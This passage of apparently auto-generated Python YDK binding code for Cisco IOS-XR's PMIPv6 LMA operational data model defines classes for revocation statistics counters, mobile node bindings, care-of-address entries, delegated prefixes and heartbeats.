self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbriReceiveStatistics(Entity):
"""
PBRI Receive Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User Init Session Terminatation
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics, self).__init__()
self.yang_name = "pbri-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbraSendStatistics(Entity):
"""
PBRA Send Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics, self).__init__()
self.yang_name = "pbra-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class PbraReceiveStatistics(Entity):
"""
PBRA Receive Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics, self).__init__()
self.yang_name = "pbra-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class Bindings(Entity):
"""
Table of Binding
.. attribute:: binding
Binding Parameters
**type**\: list of :py:class:`Binding <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings.Binding>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings, self).__init__()
self.yang_name = "bindings"
self.yang_parent_name = "lma"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("binding", ("binding", Pmipv6.Lma.Bindings.Binding))])
self._leafs = OrderedDict()
self.binding = YList(self)
self._segment_path = lambda: "bindings"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings, [], name, value)
class Binding(Entity):
"""
Binding Parameters
.. attribute:: mag_name
Peer MAG ID
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: nai_string
NAI String
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: imsi_string
IMSI String
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: customer_name
Customer String
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: mnnai
Mobile Node Identifier
**type**\: str
.. attribute:: customer_name_xr
Customer name
**type**\: str
.. attribute:: llid
Link Layer Identifier
**type**\: str
.. attribute:: peer_id
Peer Identifier
**type**\: str
.. attribute:: phyintf
Access Interface
**type**\: str
.. attribute:: tunnel
Tunnel Interface
**type**\: str
.. attribute:: state
State Name
**type**\: str
.. attribute:: apn
Access Point Network
**type**\: str
.. attribute:: att
MN ATT
**type**\: int
**range:** 0..65535
.. attribute:: hoa
MN HOA
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dflt
MN Default Router
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: lifetime
Life Time of Binding
**type**\: int
**range:** 0..4294967295
.. attribute:: liferem
Life Time Remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: refresh
Refresh Time of Binding
**type**\: int
**range:** 0..4294967295
.. attribute:: refresh_rem
Refresh Time Remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: prefix_len
Prefix Length
**type**\: int
**range:** 0..255
.. attribute:: num_hnps
HNP count
**type**\: int
**range:** 0..255
.. attribute:: num_coa
COA count
**type**\: int
**range:** 0..255
.. attribute:: num_dmnp_v4
IPv4 DMNP count
**type**\: int
**range:** 0..255
.. attribute:: num_dmnp_v6
IPv6 DMNP count
**type**\: int
**range:** 0..255
.. attribute:: hnps
MN Home Network Prefixes
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: ignore_home_address
Ignore HoA/HNP
**type**\: bool
.. attribute:: up_stream_grekey
Upstream GRE Key
**type**\: int
**range:** 0..4294967295
.. attribute:: down_stream_grekey
DownStream GRE Key
**type**\: int
**range:** 0..4294967295
.. attribute:: vrfid
VRF ID of Access Interface
**type**\: int
**range:** 0..4294967295
.. attribute:: coa
COA entries
**type**\: list of :py:class:`Coa <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings.Binding.Coa>`
.. attribute:: dmnp_v4
IPv4 DMNP prefixes
**type**\: list of :py:class:`DmnpV4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings.Binding.DmnpV4>`
.. attribute:: dmnp_v6
IPv6 DMNP prefixes
**type**\: list of :py:class:`DmnpV6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings.Binding.DmnpV6>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings.Binding, self).__init__()
self.yang_name = "binding"
self.yang_parent_name = "bindings"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("coa", ("coa", Pmipv6.Lma.Bindings.Binding.Coa)), ("dmnp-v4", ("dmnp_v4", Pmipv6.Lma.Bindings.Binding.DmnpV4)), ("dmnp-v6", ("dmnp_v6", Pmipv6.Lma.Bindings.Binding.DmnpV6))])
self._leafs = OrderedDict([
('mag_name', (YLeaf(YType.str, 'mag-name'), ['str'])),
('nai_string', (YLeaf(YType.str, 'nai-string'), ['str'])),
('imsi_string', (YLeaf(YType.str, 'imsi-string'), ['str'])),
('customer_name', (YLeaf(YType.str, 'customer-name'), ['str'])),
('mnnai', (YLeaf(YType.str, 'mnnai'), ['str'])),
('customer_name_xr', (YLeaf(YType.str, 'customer-name-xr'), ['str'])),
('llid', (YLeaf(YType.str, 'llid'), ['str'])),
('peer_id', (YLeaf(YType.str, 'peer-id'), ['str'])),
('phyintf', (YLeaf(YType.str, 'phyintf'), ['str'])),
('tunnel', (YLeaf(YType.str, 'tunnel'), ['str'])),
('state', (YLeaf(YType.str, 'state'), ['str'])),
('apn', (YLeaf(YType.str, 'apn'), ['str'])),
('att', (YLeaf(YType.uint16, 'att'), ['int'])),
('hoa', (YLeaf(YType.str, 'hoa'), ['str'])),
('dflt', (YLeaf(YType.str, 'dflt'), ['str'])),
('lifetime', (YLeaf(YType.uint32, 'lifetime'), ['int'])),
('liferem', (YLeaf(YType.uint32, 'liferem'), ['int'])),
('refresh', (YLeaf(YType.uint32, 'refresh'), ['int'])),
('refresh_rem', (YLeaf(YType.uint32, 'refresh-rem'), ['int'])),
('prefix_len', (YLeaf(YType.uint8, 'prefix-len'), ['int'])),
('num_hnps', (YLeaf(YType.uint8, 'num-hnps'), ['int'])),
('num_coa', (YLeaf(YType.uint8, 'num-coa'), ['int'])),
('num_dmnp_v4', (YLeaf(YType.uint8, 'num-dmnp-v4'), ['int'])),
('num_dmnp_v6', (YLeaf(YType.uint8, 'num-dmnp-v6'), ['int'])),
('hnps', (YLeaf(YType.str, 'hnps'), ['str'])),
('ignore_home_address', (YLeaf(YType.boolean, 'ignore-home-address'), ['bool'])),
('up_stream_grekey', (YLeaf(YType.uint32, 'up-stream-grekey'), ['int'])),
('down_stream_grekey', (YLeaf(YType.uint32, 'down-stream-grekey'), ['int'])),
('vrfid', (YLeaf(YType.uint32, 'vrfid'), ['int'])),
])
self.mag_name = None
self.nai_string = None
self.imsi_string = None
self.customer_name = None
self.mnnai = None
self.customer_name_xr = None
self.llid = None
self.peer_id = None
self.phyintf = None
self.tunnel = None
self.state = None
self.apn = None
self.att = None
self.hoa = None
self.dflt = None
self.lifetime = None
self.liferem = None
self.refresh = None
self.refresh_rem = None
self.prefix_len = None
self.num_hnps = None
self.num_coa = None
self.num_dmnp_v4 = None
self.num_dmnp_v6 = None
self.hnps = None
self.ignore_home_address = None
self.up_stream_grekey = None
self.down_stream_grekey = None
self.vrfid = None
self.coa = YList(self)
self.dmnp_v4 = YList(self)
self.dmnp_v6 = YList(self)
self._segment_path = lambda: "binding"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/bindings/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings.Binding, ['mag_name', 'nai_string', 'imsi_string', 'customer_name', 'mnnai', 'customer_name_xr', 'llid', 'peer_id', 'phyintf', 'tunnel', 'state', 'apn', 'att', 'hoa', 'dflt', 'lifetime', 'liferem', 'refresh', 'refresh_rem', 'prefix_len', 'num_hnps', 'num_coa', 'num_dmnp_v4', 'num_dmnp_v6', 'hnps', 'ignore_home_address', 'up_stream_grekey', 'down_stream_grekey', 'vrfid'], name, value)
class Coa(Entity):
"""
COA entries
.. attribute:: llid
Link Layer Identifier
**type**\: str
.. attribute:: peer_name
Peer Name
**type**\: str
.. attribute:: tunnel
Tunnel Interface
**type**\: str
.. attribute:: e_label
Egress Label
**type**\: str
.. attribute:: color
Label Color
**type**\: str
.. attribute:: roa_min_tf
Roaming Intf
**type**\: str
.. attribute:: pstate
COA STATE
**type**\: str
.. attribute:: msisdn
MSISDN
**type**\: str
.. attribute:: imsi
IMSI or IMSI NAI
**type**\: str
.. attribute:: cdma_nai
CDMA NAI
**type**\: str
.. attribute:: pgw_apn
Subscriber APN on PWG
**type**\: str
.. attribute:: pgw_trans_vrf
Subscriber Transport VRF on PGW
**type**\: str
.. attribute:: att
MN ATT
**type**\: int
**range:** 0..65535
.. attribute:: lifetime
Life Time of coa
**type**\: int
**range:** 0..4294967295
.. attribute:: lifetime_remaining
Life Time remain of coa
**type**\: int
**range:** 0..4294967295
.. attribute:: refresh
refresh Time of coa
**type**\: int
**range:** 0..4294967295
.. attribute:: refresh_rem
refresh Time remain of coa
**type**\: int
**range:** 0..4294967295
.. attribute:: dnkey
down key for coa tunnel
**type**\: int
**range:** 0..4294967295
.. attribute:: upkey
up key for coa tunnel
**type**\: int
**range:** 0..4294967295
.. attribute:: coa_v4
IPv4 CoA
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: coa_v6
IPv6 CoA
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings.Binding.Coa, self).__init__()
self.yang_name = "coa"
self.yang_parent_name = "binding"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('llid', (YLeaf(YType.str, 'llid'), ['str'])),
('peer_name', (YLeaf(YType.str, 'peer-name'), ['str'])),
('tunnel', (YLeaf(YType.str, 'tunnel'), ['str'])),
('e_label', (YLeaf(YType.str, 'e-label'), ['str'])),
('color', (YLeaf(YType.str, 'color'), ['str'])),
('roa_min_tf', (YLeaf(YType.str, 'roa-min-tf'), ['str'])),
('pstate', (YLeaf(YType.str, 'pstate'), ['str'])),
('msisdn', (YLeaf(YType.str, 'msisdn'), ['str'])),
('imsi', (YLeaf(YType.str, 'imsi'), ['str'])),
('cdma_nai', (YLeaf(YType.str, 'cdma-nai'), ['str'])),
('pgw_apn', (YLeaf(YType.str, 'pgw-apn'), ['str'])),
('pgw_trans_vrf', (YLeaf(YType.str, 'pgw-trans-vrf'), ['str'])),
('att', (YLeaf(YType.uint16, 'att'), ['int'])),
('lifetime', (YLeaf(YType.uint32, 'lifetime'), ['int'])),
('lifetime_remaining', (YLeaf(YType.uint32, 'lifetime-remaining'), ['int'])),
('refresh', (YLeaf(YType.uint32, 'refresh'), ['int'])),
('refresh_rem', (YLeaf(YType.uint32, 'refresh-rem'), ['int'])),
('dnkey', (YLeaf(YType.uint32, 'dnkey'), ['int'])),
('upkey', (YLeaf(YType.uint32, 'upkey'), ['int'])),
('coa_v4', (YLeaf(YType.str, 'coa-v4'), ['str'])),
('coa_v6', (YLeaf(YType.str, 'coa-v6'), ['str'])),
])
self.llid = None
self.peer_name = None
self.tunnel = None
self.e_label = None
self.color = None
self.roa_min_tf = None
self.pstate = None
self.msisdn = None
self.imsi = None
self.cdma_nai = None
self.pgw_apn = None
self.pgw_trans_vrf = None
self.att = None
self.lifetime = None
self.lifetime_remaining = None
self.refresh = None
self.refresh_rem = None
self.dnkey = None
self.upkey = None
self.coa_v4 = None
self.coa_v6 = None
self._segment_path = lambda: "coa"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/bindings/binding/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings.Binding.Coa, ['llid', 'peer_name', 'tunnel', 'e_label', 'color', 'roa_min_tf', 'pstate', 'msisdn', 'imsi', 'cdma_nai', 'pgw_apn', 'pgw_trans_vrf', 'att', 'lifetime', 'lifetime_remaining', 'refresh', 'refresh_rem', 'dnkey', 'upkey', 'coa_v4', 'coa_v6'], name, value)
class DmnpV4(Entity):
"""
IPv4 DMNP prefixes
.. attribute:: pfxlen
IPv4 prefix length
**type**\: int
**range:** 0..255
.. attribute:: prefix
IPv4 prefix
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings.Binding.DmnpV4, self).__init__()
self.yang_name = "dmnp-v4"
self.yang_parent_name = "binding"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pfxlen', (YLeaf(YType.uint8, 'pfxlen'), ['int'])),
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
])
self.pfxlen = None
self.prefix = None
self._segment_path = lambda: "dmnp-v4"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/bindings/binding/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings.Binding.DmnpV4, ['pfxlen', 'prefix'], name, value)
class DmnpV6(Entity):
"""
IPv6 DMNP prefixes
.. attribute:: pfxlen
IPv6 prefix length
**type**\: int
**range:** 0..255
.. attribute:: prefix
IPv6 prefix
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings.Binding.DmnpV6, self).__init__()
self.yang_name = "dmnp-v6"
self.yang_parent_name = "binding"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pfxlen', (YLeaf(YType.uint8, 'pfxlen'), ['int'])),
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
])
self.pfxlen = None
self.prefix = None
self._segment_path = lambda: "dmnp-v6"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/bindings/binding/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings.Binding.DmnpV6, ['pfxlen', 'prefix'], name, value)
class Heartbeats(Entity):
"""
Table of Heartbeat
.. attribute:: heartbeat
Heartbeat information
**type**\: list of :py:class:`Heartbeat <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Heartbeats.Heartbeat>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Heartbeats, self).__init__()
self.yang_name = "heartbeats"
self.yang_parent_name = "lma"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("heartbeat", ("heartbeat", Pmipv6.Lma.Heartbeats.Heartbeat))])
self._leafs = OrderedDict()
self.heartbeat = YList(self)
self._segment_path = lambda: "heartbeats"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Heartbeats, [], name, value)
class Heartbeat(Entity):
"""
Heartbeat information
.. attribute:: peer_addr (key)
IPv4 or IPv6 address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
